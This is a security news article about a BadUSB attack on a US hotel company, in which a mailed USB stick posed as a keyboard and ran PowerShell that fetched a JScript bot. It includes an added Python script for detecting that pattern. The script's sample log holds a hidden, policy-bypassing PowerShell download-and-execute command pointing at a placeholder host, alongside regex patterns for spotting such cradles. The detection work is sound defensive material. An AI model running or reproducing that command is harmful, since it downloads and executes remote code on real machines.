Attackers exposed an American company to a rare attack via BadUSB


Trustwave experts have published a report describing a rare BadUSB attack on an American company: an unnamed US hotel company was mailed a fake Best Buy gift card together with a malicious USB stick.

The accompanying letter said that the drive had to be plugged into a computer in order to view the list of products the gift card could be used for.

Such targeted BadUSB attacks are extremely rare in practice.

As a reminder, BadUSB is a class of attacks in which a device such as a Rubber Ducky, plugged into any machine with a USB port, presents itself to the host as a peripheral. In principle any peripheral can be emulated, but criminals most often emulate a keyboard, because that lets them inject keystrokes into the victim's session.

“The victim company found the letter suspicious and turned for help in investigating the incident,” say experts at Trustwave.

As the researchers found, after the BadUSB device was connected to a test workstation, the flash drive launched a PowerShell command through a series of automated keystrokes. That command downloaded a larger PowerShell script from a remote site, which in turn installed a JScript-based malware bot on the test machine.
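The chain described above (a USB device that enumerates as a keyboard, followed seconds later by PowerShell pulling a second stage from the internet) is something defenders can hunt for in endpoint telemetry. The following is an added example, not code from the article or from Trustwave: it correlates device-enumeration records with PowerShell process starts on the same host. The log format, field names and sample records (including the hosts, users and vendor/product IDs) are constructed for illustration and are not a real Windows event format.

```python
"""Heuristic detection of keystroke-injection followed by a PowerShell
download cradle. Added example with a constructed log format; the sample
records below are made up and are not real telemetry."""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Optional

# Assumption: a real person plugging in a keyboard rarely launches a
# suspicious PowerShell command within a minute of the device appearing.
CORRELATION_WINDOW = timedelta(seconds=60)

# Command-line traits of the hidden-execution / download-cradle pattern,
# matched case-insensitively against the PowerShell command line.
INDICATORS = {
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)\b", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "download_cradle": re.compile(r"\.download(?:string|file)\(", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
}

# Constructed sample telemetry, one record per line:
#   <ISO time>|<kind>|key=value|key=value...
# kind "pnp" = a device was enumerated, kind "proc" = a process was created.
SAMPLE_LOG = r"""
2020-03-26T10:01:02|pnp|host=WS01|class=HIDClass|desc=USB Input Device (Keyboard)|id=USB\VID_1234&PID_ABCD
2020-03-26T10:01:05|proc|host=WS01|user=jdoe|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cmd=powershell -w hidden -nop -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
2020-03-26T10:30:00|pnp|host=WS02|class=HIDClass|desc=USB Input Device (Keyboard)|id=USB\VID_5678&PID_0001
2020-03-26T11:45:00|proc|host=WS02|user=asmith|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cmd=powershell -File C:\scripts\inventory.ps1
2020-03-26T12:00:00|proc|host=WS03|user=admin|image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|cmd=powershell -enc SQBFAFgA
"""


@dataclass
class Event:
    time: datetime
    kind: str      # "pnp" or "proc"
    fields: dict


@dataclass
class Alert:
    host: str
    time: datetime
    severity: str
    indicators: list
    keyboard_device: Optional[str] = None
    seconds_after_keyboard: Optional[float] = None


def parse_log(text):
    """Parse the constructed pipe-separated format into Event objects."""
    events = []
    for line in text.strip().splitlines():
        stamp, kind, *kvs = line.split("|")
        fields = dict(kv.split("=", 1) for kv in kvs)
        events.append(Event(datetime.fromisoformat(stamp), kind, fields))
    return events


def is_keyboard(ev):
    """A newly enumerated HID device that describes itself as a keyboard."""
    return (ev.kind == "pnp" and ev.fields.get("class") == "HIDClass"
            and "keyboard" in ev.fields.get("desc", "").lower())


def powershell_indicators(ev):
    """Names of the INDICATORS that match a PowerShell process start; [] otherwise."""
    image = ev.fields.get("image", "").lower()
    if ev.kind != "proc" or not image.endswith("powershell.exe"):
        return []
    cmd = ev.fields.get("cmd", "")
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]


def find_alerts(log_text):
    """High severity: suspicious PowerShell within CORRELATION_WINDOW of a new
    keyboard-class device on the same host. Medium: suspicious PowerShell alone."""
    events = sorted(parse_log(log_text), key=lambda e: e.time)
    alerts = []
    for ev in events:
        hits = powershell_indicators(ev)
        if not hits:
            continue
        host = ev.fields["host"]
        recent_kb = [k for k in events if is_keyboard(k) and k.fields["host"] == host
                     and timedelta(0) <= ev.time - k.time <= CORRELATION_WINDOW]
        if recent_kb:
            kb = max(recent_kb, key=lambda k: k.time)
            alerts.append(Alert(host, ev.time, "high", hits, kb.fields.get("id"),
                                (ev.time - kb.time).total_seconds()))
        else:
            alerts.append(Alert(host, ev.time, "medium", hits))
    return alerts


if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_LOG):
        print(alert)
```

On the sample data only WS01 produces a high-severity alert (PowerShell with a download cradle three seconds after a keyboard-class device appeared); WS02's scheduled inventory script is ignored, and WS03's encoded command is flagged at medium severity because no new keyboard preceded it. In a real deployment the same correlation can be built from Kernel-PnP device-arrival events and Sysmon or PowerShell script-block logging, and the window and indicator list tuned to the environment.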

“At the time of the analysis, we were not able to find another similar strain of malware. The malware is unknown to us. It is difficult to say whether it was created to order, but probably it was, because it is not very widespread and seems to be targeted,” say the experts.

Trustwave experts told ZDNet that after the initial analysis, a file similar to the malware was uploaded to VirusTotal for analysis.

According to a subsequent analysis by Facebook experts, the file is probably associated with the well-known hacker group FIN7 (aka Carbanak, Carbon Spider, Anunak). It is unclear who uploaded the file to VirusTotal; perhaps it was other security researchers investigating a BadUSB attack on another victim.

“Similar [BadUSB] attacks are often modeled during pentests and used during red team exercises. But in the real world, attacks of this type are much less common,” say experts at Trustwave.

As a reminder, the previous practical BadUSB attack was described by Kaspersky Lab researchers in December 2018, when attacks on banks known as DarkVishnya came to light. In that campaign the attackers used Bash Bunny, a purpose-built USB attack tool about the size of a regular USB flash drive.

Please read about other serious dangers of USB devices.

By Vladimir Krasnogolovy

Vladimir is a technical specialist who loves giving qualified advices and tips on GridinSoft's products. He's available 24/7 to assist you in any question regarding internet security.
